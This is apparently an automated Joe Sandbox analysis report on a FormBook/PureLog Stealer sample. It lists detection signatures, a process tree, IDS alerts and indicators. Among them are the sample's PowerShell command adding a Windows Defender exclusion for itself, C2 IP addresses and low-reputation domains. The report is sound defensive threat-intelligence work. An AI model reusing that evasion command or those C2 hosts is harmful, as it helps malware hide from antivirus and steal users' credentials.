Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IETC-24017.exe

Overview

General Information

Sample name:IETC-24017.exe
Analysis ID:1562159
MD5:2d9da996ec68d0ac26b84d52a3298383
SHA1:730f898be0b7296a0b554889567e97eef497b7b6
SHA256:c5523d6938b41d9f2b512ca472f570145539087597f4f31e3e62060e88b03c48
Tags:exeuser-lowmal3
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • IETC-24017.exe (PID: 5296 cmdline: "C:\Users\user\Desktop\IETC-24017.exe" MD5: 2D9DA996EC68D0AC26B84D52A3298383)
    • powershell.exe (PID: 1748 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IETC-24017.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7232 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • IETC-24017.exe (PID: 1984 cmdline: "C:\Users\user\Desktop\IETC-24017.exe" MD5: 2D9DA996EC68D0AC26B84D52A3298383)
      • UFUUPGsATdE.exe (PID: 3164 cmdline: "C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • openfiles.exe (PID: 7400 cmdline: "C:\Windows\SysWOW64\openfiles.exe" MD5: 50BD10A4C573E609A401114488299D3D)
          • firefox.exe (PID: 7732 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1692106162.0000000006D90000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    00000003.00000002.1821676970.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.4124676785.0000000004740000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000006.00000002.4130326224.0000000007C90000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.IETC-24017.exe.6d90000.3.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.IETC-24017.exe.371e790.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                3.2.IETC-24017.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                  3.2.IETC-24017.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                    0.2.IETC-24017.exe.6d90000.3.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      Click to see the 1 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IETC-24017.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IETC-24017.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\IETC-24017.exe", ParentImage: C:\Users\user\Desktop\IETC-24017.exe, ParentProcessId: 5296, ParentProcessName: IETC-24017.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IETC-24017.exe", ProcessId: 1748, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IETC-24017.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IETC-24017.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\IETC-24017.exe", ParentImage: C:\Users\user\Desktop\IETC-24017.exe, ParentProcessId: 5296, ParentProcessName: IETC-24017.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IETC-24017.exe", ProcessId: 1748, ProcessName: powershell.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IETC-24017.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IETC-24017.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\IETC-24017.exe", ParentImage: C:\Users\user\Desktop\IETC-24017.exe, ParentProcessId: 5296, ParentProcessName: IETC-24017.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IETC-24017.exe", ProcessId: 1748, ProcessName: powershell.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-25T09:42:30.625653+010020507451Malware Command and Control Activity Detected192.168.2.449741104.21.16.20680TCP
                      2024-11-25T09:42:56.021633+010020507451Malware Command and Control Activity Detected192.168.2.449745185.27.134.14480TCP
                      2024-11-25T09:43:11.526224+010020507451Malware Command and Control Activity Detected192.168.2.44977674.48.143.8280TCP
                      2024-11-25T09:43:27.327256+010020507451Malware Command and Control Activity Detected192.168.2.449810206.238.89.11980TCP
                      2024-11-25T09:43:43.245519+010020507451Malware Command and Control Activity Detected192.168.2.449848212.123.41.10880TCP
                      2024-11-25T09:43:58.058248+010020507451Malware Command and Control Activity Detected192.168.2.449887172.67.223.20680TCP
                      2024-11-25T09:44:13.151658+010020507451Malware Command and Control Activity Detected192.168.2.449923172.67.186.19280TCP
                      2024-11-25T09:44:28.762644+010020507451Malware Command and Control Activity Detected192.168.2.449961161.97.142.14480TCP
                      2024-11-25T09:44:43.815065+010020507451Malware Command and Control Activity Detected192.168.2.44999943.199.54.15880TCP
                      2024-11-25T09:44:58.679491+010020507451Malware Command and Control Activity Detected192.168.2.450035209.74.77.10880TCP
                      2024-11-25T09:45:13.852045+010020507451Malware Command and Control Activity Detected192.168.2.450047185.27.134.20680TCP
                      2024-11-25T09:45:30.299304+010020507451Malware Command and Control Activity Detected192.168.2.450051163.44.185.18380TCP
                      2024-11-25T09:45:45.806704+010020507451Malware Command and Control Activity Detected192.168.2.450055217.160.0.20080TCP
                      2024-11-25T09:46:01.480359+010020507451Malware Command and Control Activity Detected192.168.2.450059107.167.84.4280TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-25T09:42:48.000735+010028554641A Network Trojan was detected192.168.2.449742185.27.134.14480TCP
                      2024-11-25T09:42:50.708449+010028554641A Network Trojan was detected192.168.2.449743185.27.134.14480TCP
                      2024-11-25T09:42:53.318751+010028554641A Network Trojan was detected192.168.2.449744185.27.134.14480TCP
                      2024-11-25T09:43:03.384367+010028554641A Network Trojan was detected192.168.2.44975374.48.143.8280TCP
                      2024-11-25T09:43:06.154691+010028554641A Network Trojan was detected192.168.2.44975974.48.143.8280TCP
                      2024-11-25T09:43:08.759106+010028554641A Network Trojan was detected192.168.2.44976674.48.143.8280TCP
                      2024-11-25T09:43:19.041365+010028554641A Network Trojan was detected192.168.2.449792206.238.89.11980TCP
                      2024-11-25T09:43:21.791205+010028554641A Network Trojan was detected192.168.2.449798206.238.89.11980TCP
                      2024-11-25T09:43:24.525641+010028554641A Network Trojan was detected192.168.2.449804206.238.89.11980TCP
                      2024-11-25T09:43:34.856244+010028554641A Network Trojan was detected192.168.2.449830212.123.41.10880TCP
                      2024-11-25T09:43:37.476403+010028554641A Network Trojan was detected192.168.2.449836212.123.41.10880TCP
                      2024-11-25T09:43:40.197423+010028554641A Network Trojan was detected192.168.2.449842212.123.41.10880TCP
                      2024-11-25T09:43:50.075410+010028554641A Network Trojan was detected192.168.2.449864172.67.223.20680TCP
                      2024-11-25T09:43:52.764122+010028554641A Network Trojan was detected192.168.2.449872172.67.223.20680TCP
                      2024-11-25T09:43:55.400153+010028554641A Network Trojan was detected192.168.2.449881172.67.223.20680TCP
                      2024-11-25T09:44:05.306994+010028554641A Network Trojan was detected192.168.2.449903172.67.186.19280TCP
                      2024-11-25T09:44:07.720301+010028554641A Network Trojan was detected192.168.2.449909172.67.186.19280TCP
                      2024-11-25T09:44:10.340449+010028554641A Network Trojan was detected192.168.2.449915172.67.186.19280TCP
                      2024-11-25T09:44:20.346737+010028554641A Network Trojan was detected192.168.2.449941161.97.142.14480TCP
                      2024-11-25T09:44:23.073497+010028554641A Network Trojan was detected192.168.2.449948161.97.142.14480TCP
                      2024-11-25T09:44:25.814341+010028554641A Network Trojan was detected192.168.2.449954161.97.142.14480TCP
                      2024-11-25T09:44:35.744959+010028554641A Network Trojan was detected192.168.2.44997843.199.54.15880TCP
                      2024-11-25T09:44:38.416552+010028554641A Network Trojan was detected192.168.2.44998643.199.54.15880TCP
                      2024-11-25T09:44:41.088357+010028554641A Network Trojan was detected192.168.2.44999343.199.54.15880TCP
                      2024-11-25T09:44:50.674461+010028554641A Network Trojan was detected192.168.2.450015209.74.77.10880TCP
                      2024-11-25T09:44:53.340985+010028554641A Network Trojan was detected192.168.2.450022209.74.77.10880TCP
                      2024-11-25T09:44:56.024434+010028554641A Network Trojan was detected192.168.2.450030209.74.77.10880TCP
                      2024-11-25T09:45:05.816414+010028554641A Network Trojan was detected192.168.2.450044185.27.134.20680TCP
                      2024-11-25T09:45:08.524374+010028554641A Network Trojan was detected192.168.2.450045185.27.134.20680TCP
                      2024-11-25T09:45:11.241502+010028554641A Network Trojan was detected192.168.2.450046185.27.134.20680TCP
                      2024-11-25T09:45:22.341229+010028554641A Network Trojan was detected192.168.2.450048163.44.185.18380TCP
                      2024-11-25T09:45:24.967807+010028554641A Network Trojan was detected192.168.2.450049163.44.185.18380TCP
                      2024-11-25T09:45:27.713508+010028554641A Network Trojan was detected192.168.2.450050163.44.185.18380TCP
                      2024-11-25T09:45:37.664918+010028554641A Network Trojan was detected192.168.2.450052217.160.0.20080TCP
                      2024-11-25T09:45:40.365321+010028554641A Network Trojan was detected192.168.2.450053217.160.0.20080TCP
                      2024-11-25T09:45:43.090803+010028554641A Network Trojan was detected192.168.2.450054217.160.0.20080TCP
                      2024-11-25T09:45:53.457941+010028554641A Network Trojan was detected192.168.2.450056107.167.84.4280TCP
                      2024-11-25T09:45:56.166119+010028554641A Network Trojan was detected192.168.2.450057107.167.84.4280TCP
                      2024-11-25T09:45:58.766192+010028554641A Network Trojan was detected192.168.2.450058107.167.84.4280TCP
                      2024-11-25T09:46:09.371073+010028554641A Network Trojan was detected192.168.2.45006077.68.64.4580TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Multi AV Scanner detection for submitted file
                      Source: IETC-24017.exeReversingLabs: Detection: 42%
                      Yara detected FormBook
                      Source: Yara matchFile source: 3.2.IETC-24017.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.IETC-24017.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.1821676970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4124676785.0000000004740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4130326224.0000000007C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1822234803.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4124625092.00000000046F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4124804278.0000000004D20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1824149461.0000000003920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for sample
                      Source: IETC-24017.exeJoe Sandbox ML: detected
                      Source: IETC-24017.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: IETC-24017.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: WyjV.pdb source: IETC-24017.exe
                      Source: Binary string: OpnFiles.pdb source: IETC-24017.exe, 00000003.00000002.1821955897.0000000001368000.00000004.00000020.00020000.00000000.sdmp, UFUUPGsATdE.exe, 00000006.00000003.1908291913.0000000001232000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UFUUPGsATdE.exe, 00000006.00000002.4124119366.0000000000D1E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: IETC-24017.exe, 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.1822081128.00000000045D8000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.1824349392.0000000004789000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: IETC-24017.exe, IETC-24017.exe, 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, openfiles.exe, 00000007.00000003.1822081128.00000000045D8000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.1824349392.0000000004789000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: OpnFiles.pdbGCTL source: IETC-24017.exe, 00000003.00000002.1821955897.0000000001368000.00000004.00000020.00020000.00000000.sdmp, UFUUPGsATdE.exe, 00000006.00000003.1908291913.0000000001232000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: WyjV.pdbSHA256H source: IETC-24017.exe
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_007AC810 FindFirstFileW,FindNextFileW,FindClose,7_2_007AC810
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 4x nop then mov esp, ebp6_2_07CB9E2F
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 4x nop then xor eax, eax6_2_07CBFD4D
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 4x nop then pop edi6_2_07CBA4BC
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 4x nop then xor eax, eax7_2_00799F20
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 4x nop then mov ebx, 00000004h7_2_048404E8

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49753 -> 74.48.143.82:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49759 -> 74.48.143.82:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 185.27.134.144:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49742 -> 185.27.134.144:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49741 -> 104.21.16.206:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49776 -> 74.48.143.82:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49766 -> 74.48.143.82:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49744 -> 185.27.134.144:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49745 -> 185.27.134.144:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49830 -> 212.123.41.108:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49836 -> 212.123.41.108:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49848 -> 212.123.41.108:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49842 -> 212.123.41.108:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49792 -> 206.238.89.119:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49810 -> 206.238.89.119:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49804 -> 206.238.89.119:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49887 -> 172.67.223.206:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49872 -> 172.67.223.206:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49798 -> 206.238.89.119:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49909 -> 172.67.186.192:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49903 -> 172.67.186.192:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49864 -> 172.67.223.206:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49923 -> 172.67.186.192:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49941 -> 161.97.142.144:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49948 -> 161.97.142.144:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49961 -> 161.97.142.144:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49881 -> 172.67.223.206:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49986 -> 43.199.54.158:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49954 -> 161.97.142.144:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49915 -> 172.67.186.192:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49999 -> 43.199.54.158:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50015 -> 209.74.77.108:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49993 -> 43.199.54.158:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 209.74.77.108:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49978 -> 43.199.54.158:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 209.74.77.108:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 185.27.134.206:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50044 -> 185.27.134.206:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50048 -> 163.44.185.183:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50057 -> 107.167.84.42:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50051 -> 163.44.185.183:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50053 -> 217.160.0.200:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50059 -> 107.167.84.42:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50050 -> 163.44.185.183:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50035 -> 209.74.77.108:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50058 -> 107.167.84.42:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50047 -> 185.27.134.206:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50060 -> 77.68.64.45:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50049 -> 163.44.185.183:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50055 -> 217.160.0.200:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50052 -> 217.160.0.200:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50046 -> 185.27.134.206:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50054 -> 217.160.0.200:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50056 -> 107.167.84.42:80
                      Performs DNS queries to domains with low reputation
                      Source: DNS query: www.amayavp.xyz
                      Source: DNS query: www.izmirescortg.xyz
                      Source: DNS query: www.030002613.xyz
                      Source: Joe Sandbox ViewIP Address: 212.123.41.108 212.123.41.108
                      Source: Joe Sandbox ViewIP Address: 185.27.134.144 185.27.134.144
                      Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                      Source: Joe Sandbox ViewASN Name: EPAG-ASDE EPAG-ASDE
                      Source: Joe Sandbox ViewASN Name: WILDCARD-ASWildcardUKLimitedGB WILDCARD-ASWildcardUKLimitedGB
                      Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
